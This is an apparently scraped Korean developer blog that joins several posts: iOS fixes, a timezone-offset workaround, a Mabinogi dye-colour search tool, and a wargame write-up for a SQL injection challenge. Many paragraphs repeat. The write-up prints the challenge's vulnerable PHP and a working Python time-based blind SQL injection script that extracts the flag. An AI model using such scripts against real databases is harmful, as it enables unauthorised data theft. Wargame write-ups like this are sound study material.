늘모자란, 개발
Result for 전체:
유저이름, 유저 비밀번호는 아무 쓸모 없음. 시간에 집중
풀이법을 쓰면 안된다니까 그냥 힌트만 적기로 해본다
100점짜리 문제고, 별다른 필터링이 없는 것 같아보인다. PHP를 돌릴 환경하나 쯤 구축해두면 좋을 것 같고, 쿠키를 잘 봅시다
100점짜리 문제고, 별다른 필터링이 없는 것 같아보인다. PHP를 돌릴 환경하나 쯤 구축해두면 좋을 것 같고, 쿠키를 잘 봅시다
이번에 해볼 사이트는 noe.systems 라는 특이한 도메인을 가진 워게임이고, wechall 에서 발견해서 해보게되었다.
근데 풀이법을 올리면 안된대서 그냥 비공개 write-up 이라도 써볼까 한다. 근데 웹이 주력이 아니라서 몇개나 올릴지는 잘 모르겠고..
문제 견적 봐가며 한번 풀어봅시다..
근데 풀이법을 올리면 안된대서 그냥 비공개 write-up 이라도 써볼까 한다. 근데 웹이 주력이 아니라서 몇개나 올릴지는 잘 모르겠고..
문제 견적 봐가며 한번 풀어봅시다..
기업용앱은 ipa로 배포하곤 한다. 내부배포니까 굳이 앱스토어에 올릴 필요가 없기 때문이다.
원래는 ipa를 더블클릭하면 아이튠즈 창이 활성화 되고, 기기의 '앱' 메뉴가 열리며 설치예정, 삭제예정 등이 나왔는데
아이튠즈 12.7이 업데이트 되면서 그런 메뉴가 다 사라졌다. 앱에 파일 넣던 기능은 '파일 공유'로 바뀌었고, ipa설치는 흔적도 없어져 어떻게 까나.. 싶었는데, 방법은 그냥 ipa를 드래그해서 '기기' 밑에 연결된 기기에 그냥 드래그 하면 깔린다. 어이가 없게 바뀌긴했는데...
.헤매지말고 잘들 깔아보시라..
원래는 ipa를 더블클릭하면 아이튠즈 창이 활성화 되고, 기기의 '앱' 메뉴가 열리며 설치예정, 삭제예정 등이 나왔는데
아이튠즈 12.7이 업데이트 되면서 그런 메뉴가 다 사라졌다. 앱에 파일 넣던 기능은 '파일 공유'로 바뀌었고, ipa설치는 흔적도 없어져 어떻게 까나.. 싶었는데, 방법은 그냥 ipa를 드래그해서 '기기' 밑에 연결된 기기에 그냥 드래그 하면 깔린다. 어이가 없게 바뀌긴했는데...
.헤매지말고 잘들 깔아보시라..
iOS 코드중
[self.window setHidden] 옵션을 사용하는 경우가 있다. 파라미터에 NO를 줘 AppDelegate 에서 사용할 경우 앱이 새카맣게 되는 효과가 생긴다.
즉 화면이 내려갈때 창을 감춰버리기때문에 한순간도 보이지 않게 하는 효과를 낼수도 있지만 사실 거의 사용할 일은 없을 것 같은 기능이다.
이번에 회사앱을 만들면서 길고 긴 키보드 이슈가 있었는데, 앱에서 키보드를 치다가 홈버튼으로 나갔다 들어오면 키보드를 더 이상 사용할 수 없게 되는 황당한 버그였다.
이 문제의 결론은 iOS11에서 변경된 사항으로 인해 일어나는 버그였었는데, 내가 직접 테스트 해본건 아니고 벤더사의 메일 내용을 대부분 인용해서 블로깅한다. (아마 관계자 분들께서 들리실 수도 있을 것같다. 이런 삽질은 정말.. 유니크하다...)
해당 코드가 실행되면 window의 visible의 false로 변경되며 key window도 아니게 된다
이 상태에서 [self.window setHidden:NO]를 실행하게 되면 iOS10과 iOS11에서 동작하는 로직이 달라 문제가 생긴다
해당 윈도우 visible이 true가 되며 key widnow로 변경됨
key window로 변경되지 않음 = 키보드 관련 이벤트가 동작하지 않는다
iOS10과 11이상의 버전에서 달리 이벤트를 처리한다
iOS10 이하에서는
만 사용해도 좋다.
iOS11에서는 다음과 같이 변경한다
혹은,
로 작성하면 정상적으로 사용이 가능하다
[self.window setHidden] 옵션을 사용하는 경우가 있다. 파라미터에 NO를 줘 AppDelegate 에서 사용할 경우 앱이 새카맣게 되는 효과가 생긴다.
즉 화면이 내려갈때 창을 감춰버리기때문에 한순간도 보이지 않게 하는 효과를 낼수도 있지만 사실 거의 사용할 일은 없을 것 같은 기능이다.
이번에 회사앱을 만들면서 길고 긴 키보드 이슈가 있었는데, 앱에서 키보드를 치다가 홈버튼으로 나갔다 들어오면 키보드를 더 이상 사용할 수 없게 되는 황당한 버그였다.
이 문제의 결론은 iOS11에서 변경된 사항으로 인해 일어나는 버그였었는데, 내가 직접 테스트 해본건 아니고 벤더사의 메일 내용을 대부분 인용해서 블로깅한다. (아마 관계자 분들께서 들리실 수도 있을 것같다. 이런 삽질은 정말.. 유니크하다...)
1. [self.window setHidden:YES]
해당 코드가 실행되면 window의 visible의 false로 변경되며 key window도 아니게 된다
이 상태에서 [self.window setHidden:NO]를 실행하게 되면 iOS10과 iOS11에서 동작하는 로직이 달라 문제가 생긴다
2. iOS10
해당 윈도우 visible이 true가 되며 key widnow로 변경됨
3. iOS11
key window로 변경되지 않음 = 키보드 관련 이벤트가 동작하지 않는다
해결
iOS10과 11이상의 버전에서 달리 이벤트를 처리한다
iOS10 이하에서는
[self.window setHidden:NO];
만 사용해도 좋다.
iOS11에서는 다음과 같이 변경한다
[self.window setHidden:NO]; [self.window makeKeyWindow];
혹은,
[self.window makeKeyVisible];
로 작성하면 정상적으로 사용이 가능하다
제목을 영어로 하는데 문법이 맞나 안맞나도 잘 모르겠다.
국내에서만 서비스하면 상관없겠지만, 해외에서도 서비스를 사용하고자 하는 사람도 있다.
대개는 문제가 없다. 왜냐면 서버에서 요구하는데로 보여지기 때문인데, 클라이언트에서 timer등을 이용해 유저에게 보여지는 식으로 구성했을때는 문제가 된다
요컨데 싴갤러스- 밀수업자 기능에서 사용하고 있는 방법은,
먼저 서버에서 데이터를 받아와 표를 만들고, 마지막 데이터를 로컬 시간에 저장해놨다가 그 시간까지 타이머를 돌리는 반영구적인 타이머를 구성해두었다. 하지만 서버에서 반환하는 값은 서버사이드의 시간이고, 로컬에서 처리하는 시간은 컴퓨터의 시간을 읽으니까, 타이머의 역할을 수행하지 못하는 버그(?) 가 있었다
이를 처리하기 위해서 처음에는 new date().getTime() 을 서버 사이드로 보내고, 서버 사이드에서 diff를 처리하는 식으로 수행했다
클라이언트
서버(PHP)
이렇게 하면 로컬에서 보내는 시간과 서버의 초 차이를 계산해, 서버 사이드에서 데이터를 계산해 출력해주게 된다.
근데 이상하게 잘 안되었다. 분명히 클라이언트와 서버시간이 달라야하는데, 같은 값을 받을때가 더 많았다. 결론은, 실패였다
(테스트를 컴퓨터 시간을 바꿔가면서만 테스트 했기 때문일지도 모르지만 크게 다를것이라고 생각하진 않음)
그래서 두번째로 시도한것은,
서버에서 시간을 당겨와 현재 로컬타임을 계산해버리자는 것이었다.
jquery에서 ajax로 임의 페이지에 질의하면 header에는 반드시 date 헤더가 실려오게 된다. 이를 js 로 다시 파싱하면 서버기준으로 시간을 처리할 수 있게 된다. 원래 이런 목적은 type에 head를 사용해주면 되는데, forbidden 이 뜬다. 그래도 시간 얻는데는 문제가 없으니..
이런식으로 servertime을 얻어서 처리하면 되는데 ajax이기때문에 callback과 async에서 짜증을 겪을 수 있다. 적절히 처리하면 되긴하지만..
그런 다음,
이렇게 클라이언트에서다 처리해서 보내주기로 했다. 그러나, 처음했던 것 처럼 시간이 제멋대로 놀아나는 바람에 역시 제대로 계산되지가 않았다. 조금 더 고민해보다가.. 애초에 지역으로 나뉜 시간을 쓴다면 해당 지역의 offset을 보내줘버리고 내가 모두 처리해버리자 싶어서 검색하다가 다음을 찾았다
이렇게 하면 현재 로컬 시간이 gmt와 얼마나 차이나는지 알려준다. 우리는 한국시간이니까 -540이 리턴된다. 나누기 60 하면 9니까..
그래서 서버에서 540을 기준으로 잡아놓고, 로컬 시간과 서버 사이드 시간이 얼마나 차이가 나는지 확인하면 된다
아주 어려운 코딩은 아니었지만, 해외 유저들을 전혀 고려한적조차 없었고 (문제가 될줄도 몰랐기 때문에), 많이 당황했던 하루였다.
로컬에서 시간 관련 타이머를 사용한다면 반드시 고려해보자
국내에서만 서비스하면 상관없겠지만, 해외에서도 서비스를 사용하고자 하는 사람도 있다.
대개는 문제가 없다. 왜냐면 서버에서 요구하는데로 보여지기 때문인데, 클라이언트에서 timer등을 이용해 유저에게 보여지는 식으로 구성했을때는 문제가 된다
요컨데 싴갤러스- 밀수업자 기능에서 사용하고 있는 방법은,
먼저 서버에서 데이터를 받아와 표를 만들고, 마지막 데이터를 로컬 시간에 저장해놨다가 그 시간까지 타이머를 돌리는 반영구적인 타이머를 구성해두었다. 하지만 서버에서 반환하는 값은 서버사이드의 시간이고, 로컬에서 처리하는 시간은 컴퓨터의 시간을 읽으니까, 타이머의 역할을 수행하지 못하는 버그(?) 가 있었다
이를 처리하기 위해서 처음에는 new date().getTime() 을 서버 사이드로 보내고, 서버 사이드에서 diff를 처리하는 식으로 수행했다
클라이언트
var d = new Date();
$.ajax...
data: { "date" : d.getTime(); }
...
서버(PHP)
$diff = (time() - round($_POST['date']/1000))*-1;
if ( $diff > 0 ) { $diff = "+".$diff; }
strtotime(TIME."$diff seconds");
이렇게 하면 로컬에서 보내는 시간과 서버의 초 차이를 계산해, 서버 사이드에서 데이터를 계산해 출력해주게 된다.
근데 이상하게 잘 안되었다. 분명히 클라이언트와 서버시간이 달라야하는데, 같은 값을 받을때가 더 많았다. 결론은, 실패였다
(테스트를 컴퓨터 시간을 바꿔가면서만 테스트 했기 때문일지도 모르지만 크게 다를것이라고 생각하진 않음)
그래서 두번째로 시도한것은,
서버에서 시간을 당겨와 현재 로컬타임을 계산해버리자는 것이었다.
jquery에서 ajax로 임의 페이지에 질의하면 header에는 반드시 date 헤더가 실려오게 된다. 이를 js 로 다시 파싱하면 서버기준으로 시간을 처리할 수 있게 된다. 원래 이런 목적은 type에 head를 사용해주면 되는데, forbidden 이 뜬다. 그래도 시간 얻는데는 문제가 없으니..
$.ajax { ...
success: function (dt, status, request) {
servertime = request.getResponseHeader('date');
}
이런식으로 servertime을 얻어서 처리하면 되는데 ajax이기때문에 callback과 async에서 짜증을 겪을 수 있다. 적절히 처리하면 되긴하지만..
그런 다음,
data: { "date" : (d.getTime()/1000) - (new Date(servertime).getTime()/1000) },
이렇게 클라이언트에서다 처리해서 보내주기로 했다. 그러나, 처음했던 것 처럼 시간이 제멋대로 놀아나는 바람에 역시 제대로 계산되지가 않았다. 조금 더 고민해보다가.. 애초에 지역으로 나뉜 시간을 쓴다면 해당 지역의 offset을 보내줘버리고 내가 모두 처리해버리자 싶어서 검색하다가 다음을 찾았다
data: { "date" : d.getTimezoneOffset() },
이렇게 하면 현재 로컬 시간이 gmt와 얼마나 차이나는지 알려준다. 우리는 한국시간이니까 -540이 리턴된다. 나누기 60 하면 9니까..
그래서 서버에서 540을 기준으로 잡아놓고, 로컬 시간과 서버 사이드 시간이 얼마나 차이가 나는지 확인하면 된다
$diff = (540 + ((int)$_POST['date']))*-1;
아주 어려운 코딩은 아니었지만, 해외 유저들을 전혀 고려한적조차 없었고 (문제가 될줄도 몰랐기 때문에), 많이 당황했던 하루였다.
로컬에서 시간 관련 타이머를 사용한다면 반드시 고려해보자
마비노기라는 게임이 다른 게임과 차별화되는 점이라면 바로 색이 아닐까요?
어떤 아이템이던 유저들이 원하는 색으로 커스터마이즈 할 수 있다는 점은 게임 출시 직후나 지금까지도 신선한 시스템임에 틀림없습니다.
게임 운영진이 정한 팔레트내에서 염색이 되기 때문입니다. 이렇게 미리 정의된 색상들은 착용할 수 있는 모든 부위에 존재합니다.
(몬스터 드랍의 경우는 다른 팔레트를 사용합니다. 때문에 오리지널 색상에만 있는 색도 존재합니다)
외국 마비노기 커뮤니티에 잘 쓰여진 Mabination의 글이 있어 소개하겠습니다.
우리에게 익숙한 다음과 같은 팔레트가 있습니다
이런 팔레트는 어떻게 매번 인터페이스를 열때마다 다르게 생성되는것일까요?
팔레트들의 원형이 되는 이미지가 아이템 부위별로 존재합니다.
미리 정의된 색상이 있고, 이를 다음 연산을 통해 비틉니다
이를 똑같이 생성해내는 wrapper 가 있으나 이것까지 알 필욘 없고..
(사실 잘 모르겠습니다. 모의 염색 시뮬 만드는 날이 올 수도 있지 않을까요?)
저희가 주목한 사실은 팔레트의 raw data가 미리 정해져있다는 것입니다. 즉, 한 픽셀씩 이동하며 색을 추출해내면(혹은 라이브러리를 이용), 일반 앰플로 염색할 수 있는 색상을 추출해낼 수 있을 것이라 생각해 작업을 시작했고, 각 타입별로 다음과 같은 유니크한 색들이 존재함을 알 수 있었습니다.
더 많은 파트를 확보할 수도 있었으나, 가장 많이 사용되는 파트를 뽑았습니다. 그 마저도 요새 나오는 아이템들은 전부 천 파트라 야광과 실크를 할까 말까 고민을 많이 하기도 했는데요. 그냥 다 넣는걸로 했습니다.
이제 붙일 내용은 준비가 끝났습니다
제일 처음에는 앞서 설명한 내용만을 가지고 구성했습니다.
그런데 보기가 너무 불편해서 다음과 같이 그림으로 나타내볼 생각을 했습니다.
그러다가 문장 하나를 적었는데 비슷한 색.. 비슷한 색.. 이 블로그에도 내용이 있지만 color difference를 가지고 놀아본적이 있기때문에 충분히 뽑아줄 수 있을 것이라 생각했죠. 그래서 이 기능을 서브 기능이 아니라 본 기능으로 빼자, 넓게넓게 보여주고 지염에서도 비슷한 거도 보여주고 넓게 넓게 탭을 구성하자고 생각했고 다음과 같이 구성했습니다.
이 후에, 출처들도 누르면 검색되게 하고 글자 색도 배경에 따라 바뀌게 하는 등 변경을 했는데, 큰 변화 없이 구성을 했습니다.
여기서 UI/UX 적 고민을 하게 되었는데 과연 표시된 색을 클릭할 생각이 드냐는거였습니다. 누가 도대체 이런 색 상자 박스를 클릭할 것인가에 대한 토론이 있었고, 아이콘을 넣어보자는 의견이 있었습니다.
그리고, 여태까지 진행된 추가 검색은 모두 있는 색 상자에 대해서만 진행되었던 것으로, 완전히 존재하지 않는 색이 검색되더라도 해당 기능을 제공하기로 결정했습니다.
그래서 이런 모양을 모든 색 상자에 적용해 다음과 같은 최종 결과물로 완성하게 되었습니다.
CIE 2000 으로 색상을 정렬했을때 다음과 같은 문제가 있었는데요.
리블 검색을 했을때 근접해서 나오는 색상에 왠 이상한 흰색이 있다는 것이었습니다. 헌데 색을 군집해서 검색하는 CIE 2000 (다른 CIE들도 비슷) 특성상, 잘못된 결과가 아니었습니다. 검정색을 검색했는데.. 흰색이 가장 근접한 색상 BEST 10 이라고 보여드릴 수는 없었습니다. 따라서 tie-break (CIE로 색을 검색할 경우 소숫점 5자리 단위에 따라서 갈라지는 경우도 많습니다)를 위해 추가 weight를 주기로 했습니다.
혹시 CIE 2000이 잘못구현된게 아닌가 싶어서 여러 언어로도 해보고, 직접 wrap을 해보기도 했는데 할때마다 맞다는 결과만..
색의 거리를 검사하는 다음 공식으로 보여줄까도 생각했지만 터무니 없는 결과만 나왔구요.
그래서 찾아다니고 실험해보다가 가장 거리가 많이 나오는 다음 공식을 추가 weight으로 결정했습니다. (최종 값은 *0.1)
이 글을 읽고 적용한건데 잘못된 선택이 아니었길 바래봅니다..
지염 도서관은 게임 시스템상 많은 수요가 있다고 생각합니다. 앞으로 또 어떤 삽질로 만나 뵙게 될지 기대 되네요.
ps. 기능을 만들던 와중에...
어떤 아이템이던 유저들이 원하는 색으로 커스터마이즈 할 수 있다는 점은 게임 출시 직후나 지금까지도 신선한 시스템임에 틀림없습니다.
자유롭지 않은 색상
아시겠지만, 마비노기의 색상 선택은 완전히 자유롭진 못합니다.게임 운영진이 정한 팔레트내에서 염색이 되기 때문입니다. 이렇게 미리 정의된 색상들은 착용할 수 있는 모든 부위에 존재합니다.
(몬스터 드랍의 경우는 다른 팔레트를 사용합니다. 때문에 오리지널 색상에만 있는 색도 존재합니다)
외국 마비노기 커뮤니티에 잘 쓰여진 Mabination의 글이 있어 소개하겠습니다.
우리에게 익숙한 다음과 같은 팔레트가 있습니다
천옷 염색 팔레트
이런 팔레트는 어떻게 매번 인터페이스를 열때마다 다르게 생성되는것일까요?
팔레트들의 원형이 되는 이미지가 아이템 부위별로 존재합니다.
천옷 팔레트의 raw data
미리 정의된 색상이 있고, 이를 다음 연산을 통해 비틉니다
팔레트 생성 그래프
이를 똑같이 생성해내는 wrapper 가 있으나 이것까지 알 필욘 없고..
(사실 잘 모르겠습니다. 모의 염색 시뮬 만드는 날이 올 수도 있지 않을까요?)
저희가 주목한 사실은 팔레트의 raw data가 미리 정해져있다는 것입니다. 즉, 한 픽셀씩 이동하며 색을 추출해내면(혹은 라이브러리를 이용), 일반 앰플로 염색할 수 있는 색상을 추출해낼 수 있을 것이라 생각해 작업을 시작했고, 각 타입별로 다음과 같은 유니크한 색들이 존재함을 알 수 있었습니다.
| 타입 | 갯수 |
| 천옷 | 13,536 |
| 야광 | 39,452 |
| 가죽 | 9,975 |
| 실크 | 9,711 |
| 금속 | 7,858 |
더 많은 파트를 확보할 수도 있었으나, 가장 많이 사용되는 파트를 뽑았습니다. 그 마저도 요새 나오는 아이템들은 전부 천 파트라 야광과 실크를 할까 말까 고민을 많이 하기도 했는데요. 그냥 다 넣는걸로 했습니다.
이제 붙일 내용은 준비가 끝났습니다
처음에는 이렇게 만들려고 했습니다
제일 처음에는 앞서 설명한 내용만을 가지고 구성했습니다.
그런데 보기가 너무 불편해서 다음과 같이 그림으로 나타내볼 생각을 했습니다.
그러다가 문장 하나를 적었는데 비슷한 색.. 비슷한 색.. 이 블로그에도 내용이 있지만 color difference를 가지고 놀아본적이 있기때문에 충분히 뽑아줄 수 있을 것이라 생각했죠. 그래서 이 기능을 서브 기능이 아니라 본 기능으로 빼자, 넓게넓게 보여주고 지염에서도 비슷한 거도 보여주고 넓게 넓게 탭을 구성하자고 생각했고 다음과 같이 구성했습니다.
이 후에, 출처들도 누르면 검색되게 하고 글자 색도 배경에 따라 바뀌게 하는 등 변경을 했는데, 큰 변화 없이 구성을 했습니다.
여기서 UI/UX 적 고민을 하게 되었는데 과연 표시된 색을 클릭할 생각이 드냐는거였습니다. 누가 도대체 이런 색 상자 박스를 클릭할 것인가에 대한 토론이 있었고, 아이콘을 넣어보자는 의견이 있었습니다.
그리고, 여태까지 진행된 추가 검색은 모두 있는 색 상자에 대해서만 진행되었던 것으로, 완전히 존재하지 않는 색이 검색되더라도 해당 기능을 제공하기로 결정했습니다.
그래서 이런 모양을 모든 색 상자에 적용해 다음과 같은 최종 결과물로 완성하게 되었습니다.
근접 색상 검색에 대하여
그간 썼던 글을 읽으셨던 분들도 있겠지만, 싴갤러스에서 근접 색상 정렬을 위해 사용하는 기법은 CIE 2000 입니다. 헌데 색상 거리 검색이라는건 사실 이거다! 하고 명확하게 정의할 수가 없습니다. 사람이 느끼는것과 기계적(이론적)으로 판단하는것과는 꽤나 차이가 있기 때문입니다.CIE 2000 으로 색상을 정렬했을때 다음과 같은 문제가 있었는데요.
리블 검색을 했을때 근접해서 나오는 색상에 왠 이상한 흰색이 있다는 것이었습니다. 헌데 색을 군집해서 검색하는 CIE 2000 (다른 CIE들도 비슷) 특성상, 잘못된 결과가 아니었습니다. 검정색을 검색했는데.. 흰색이 가장 근접한 색상 BEST 10 이라고 보여드릴 수는 없었습니다. 따라서 tie-break (CIE로 색을 검색할 경우 소숫점 5자리 단위에 따라서 갈라지는 경우도 많습니다)를 위해 추가 weight를 주기로 했습니다.
혹시 CIE 2000이 잘못구현된게 아닌가 싶어서 여러 언어로도 해보고, 직접 wrap을 해보기도 했는데 할때마다 맞다는 결과만..
색의 거리를 검사하는 다음 공식으로 보여줄까도 생각했지만 터무니 없는 결과만 나왔구요.
sqrt((r2 - r1)^2 + (g2 - g1)^2 + (b2 - b1)^2)
그래서 찾아다니고 실험해보다가 가장 거리가 많이 나오는 다음 공식을 추가 weight으로 결정했습니다. (최종 값은 *0.1)
이 글을 읽고 적용한건데 잘못된 선택이 아니었길 바래봅니다..
double ColourDistance(RGB e1, RGB e2) {
long rmean = ( (long)e1.r + (long)e2.r ) / 2;
long r = (long)e1.r - (long)e2.r;
long g = (long)e1.g - (long)e2.g;
long b = (long)e1.b - (long)e2.b;
return sqrt((((512+rmean)*r*r)>>8) + 4*g*g + (((767-rmean)*b*b)>>8));
}
지염 도서관은 게임 시스템상 많은 수요가 있다고 생각합니다. 앞으로 또 어떤 삽질로 만나 뵙게 될지 기대 되네요.
ps. 기능을 만들던 와중에...
<?php
include "./config.php";
login_chk();
dbconnect();
function reset_flag(){
$new_flag = substr(md5(rand(10000000,99999999)."qwer".rand(10000000,99999999)."asdf".rand(10000000,99999999)),8,16);
$chk = @mysql_fetch_array(mysql_query("select id from prob_umaru where id='{$_SESSION[los_id]}'"));
if(!$chk[id]) mysql_query("insert into prob_umaru values('{$_SESSION[los_id]}','{$new_flag}')");
else mysql_query("update prob_umaru set flag='{$new_flag}' where id='{$_SESSION[los_id]}'");
echo "reset ok";
highlight_file(__FILE__);
exit();
}
if(!$_GET[flag]){ highlight_file(__FILE__); exit; }
if(preg_match('/prob|_|\./i', $_GET[flag])) exit("No Hack ~_~");
if(preg_match('/id|where|order|limit|,/i', $_GET[flag])) exit("HeHe");
if(strlen($_GET[flag])>100) exit("HeHe");
$realflag = @mysql_fetch_array(mysql_query("select flag from prob_umaru where id='{$_SESSION[los_id]}'"));
@mysql_query("create temporary table prob_umaru_temp as select * from prob_umaru where id='{$_SESSION[los_id]}'");
@mysql_query("update prob_umaru_temp set flag={$_GET[flag]}");
$tempflag = @mysql_fetch_array(mysql_query("select flag from prob_umaru_temp"));
if((!$realflag[flag]) || ($realflag[flag] != $tempflag[flag])) reset_flag();
if($realflag[flag] === $_GET[flag]) solve("umaru");
?>
id where order limit, 뭐 쓸수있는게 없고 100자 넘어도 안된다
살살하다가 갑자기 살벌하게 튀어 나온 느낌이라 문제보고 좀 벙쪘는데 힘내서...
보면 reset_flag 가 실행되면 무조건 플래그가 리셋되는데 이걸 막아야된다.
reset_flag가 실행되는 시점은 단 한군데 뿐인데, 이 친구를 저지할 수 있는 시점이라고 하면 update prob_umaru... 밖에 없다. 여기서 고의로 에러를 발생시켜줘야한다. (소스상 처리가 되지 않은 PHP는 에러가 나면 반드시 죽기 때문이다)
그래서 flag에 처음엔 빈값을 넣음과 동시에 @t:=flag를 이용해 강제로 업데이트치고 패스해볼까 했는데 , 가 필터링되고 있었다. 하..
에러도 내면서 참일땐 비교도 해야 된다니 어려운일이 아닐 수가 없다. 일단 select 가 아닌 update에서의 sqli 이기 때문에 sleep 을 사용해야 되는건 맞는것 같고, 어떻게 if를 bypass할지 검색해보다가 그냥 실행만 되면 된다는거 같다. 그래서 사용을 xor 연산을 의미하는 ^ 를 사용하는데, 사실 다른 연산자는 안찾아봤지만 아마 시프트 연산도 가능할 것 같단 생각이다 "<<" 라던지..
우선 페이로드를 다 작성했는데 정말 16자리에서 끊어지는지 아닌지 확인하기 위해 다음과 같이 쿼리를 짰다
for j in range(1,200):
start_time = time.time()
data = "(select sleep(case when length(flag) like {} then '20' else '0' END)^(select '1' union select '2'))".format(j)
data = requests.utils.quote(data)
#print data
r = requests.get(url+'?flag='+data,headers=headers)
times = time.time() - start_time
print j, times
if times > 20:
loop = j
break
print loop
16에서 정확히 멈춘다. (네트워크가 불안해서 자꾸 이상한 값이 나와서 아예 큰 값을 줘버렸는데 적당히 판단들 하시길..)
이 코드를 조금만 수정해서 이제 페이로드를 따는데 진짜 골때리는 일이 벌어졌다
9자리쯤 캐치를 했는데 글쎄 100자리 제한에 걸리는것이다. 즉, like 로 비교를 걸었더니 플래그에 들어갈 string도 length 체크 대상에 들어가는것이다. 다시 말하면, payload를 16자를 뺀 83~4자안에서 끝내야 된다는것이다.... 아뿔싸가 아닐 수 없다. 어느 부분을 줄여야 하나... 8자 정도만 더 줄이면 되는데! 라고 적어놓고 보니 일일히 ' 를 해놨길래 다 뺐다. 아마 거의 자리수를 끝까지 이용하는 payload가 아닐까 싶다..
#!/usr/bin/env python
# -*- coding: utf8 -*-
import requests, time
headers = {'Host': 'los.eagle-jump.org', 'Cookie': 'PHPSESSID=;'}
url = "http://los.eagle-jump.org/umaru_.php"
string = "1234567890abcdefghijklmnopqrstuvwxyz"
loop = 0
pw = ''
for j in range(1,200):
start_time = time.time()
data = "(select sleep(case when length(flag) like {} then '20' else '0' END)^(select '1' union select '2'))".format(j)
data = requests.utils.quote(data)
#print data
r = requests.get(url+'?flag='+data,headers=headers)
times = time.time() - start_time
print j, times
if times > 20:
loop = j
break
print loop
for i in range(1,loop+1):
for j in string:
start_time = time.time()
data = "(select sleep(case when flag like '{}{}%' then 2 else 0 END)^(select 1 union select 2))".format(pw,j)
data = requests.utils.quote(data)
#print data
r = requests.get(url+'?flag='+data,headers=headers)
times = time.time() - start_time
print j, times
if times > 2:
pw = pw + str(j)
print "[!] found",pw
break
print pw
<?php
include "./config.php";
login_chk();
dbconnect();
echo "<h1>Sorry, this challenge is broken! (Thanks to <i>@dohyeokkim</i>)</h1>";
solve("hell_fire");
highlight_file(__FILE__);
?>
<?php
include "./config.php";
login_chk();
dbconnect();
if(preg_match('/_|\.|\(\)/i', $_GET[limit])) exit("No Hack ~_~");
echo "<h1>Sorry, this challenge is broken! (Thanks to <i>@dohyeokkim</i>)</h1>";
solve("evil_wizard");
highlight_file(__FILE__);
?>
헤헷... 뭐지....
도대체 뭔가 싶어서 찾아보니 이런 문제였다고 한다. DB버전을 올릴 수 없어서... 라는데 조금 아쉽긴하다.